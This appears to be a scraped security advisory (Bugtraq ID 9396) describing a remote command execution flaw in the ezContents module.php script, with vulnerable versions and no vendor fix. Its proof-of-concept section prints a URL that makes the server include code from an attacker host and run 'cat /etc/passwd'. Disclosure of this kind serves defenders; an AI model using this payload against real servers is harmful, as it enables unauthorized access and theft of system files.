VisualShapers EZContents Module.PHP Remote Command Execution Vulnerability
BID:9396
Info
VisualShapers EZContents Module.PHP Remote Command Execution Vulnerability
| Bugtraq ID: | 9396 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 10 2004 12:00AM |
| Updated: | Jan 10 2004 12:00AM |
| Credit: | Discovery credited to Zero_X. |
| Vulnerable: |
VisualShapers ezContents 2.0.1 VisualShapers ezContents 2.0 rc3 VisualShapers ezContents 2.0 rc2 VisualShapers ezContents 2.0 rc1 VisualShapers ezContents 1.45 b VisualShapers ezContents 1.44 VisualShapers ezContents 1.43 VisualShapers ezContents 1.42 VisualShapers ezContents 1.41 VisualShapers ezContents 1.40 VisualShapers ezContents 1.4.5 |
| Not Vulnerable: | |
Discussion
VisualShapers EZContents Module.PHP Remote Command Execution Vulnerability
A problem in handling of specific types of input passed to the module.php script in VisualShapers ezContents has been discovered. Because of this, an attacker may be able to gain unauthorized access to vulnerable systems.
A problem in handling of specific types of input passed to the module.php script in VisualShapers ezContents has been discovered. Because of this, an attacker may be able to gain unauthorized access to vulnerable systems.
Exploit / POC
VisualShapers EZContents Module.PHP Remote Command Execution Vulnerability
The following proof-of-concept has been made available by Zero_X:
http://www.example.com/module.php?link=http://attacker.example.com/index.php&cmd=cat /etc/passwd
The following proof-of-concept has been made available by Zero_X:
http://www.example.com/module.php?link=http://attacker.example.com/index.php&cmd=cat /etc/passwd
Solution / Fix
VisualShapers EZContents Module.PHP Remote Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
VisualShapers EZContents Module.PHP Remote Command Execution Vulnerability
References:
References:
- Home Page (VisualShapers)
- Remote Code Execution in ezContents (Zero_X www.lobnan.de Team
)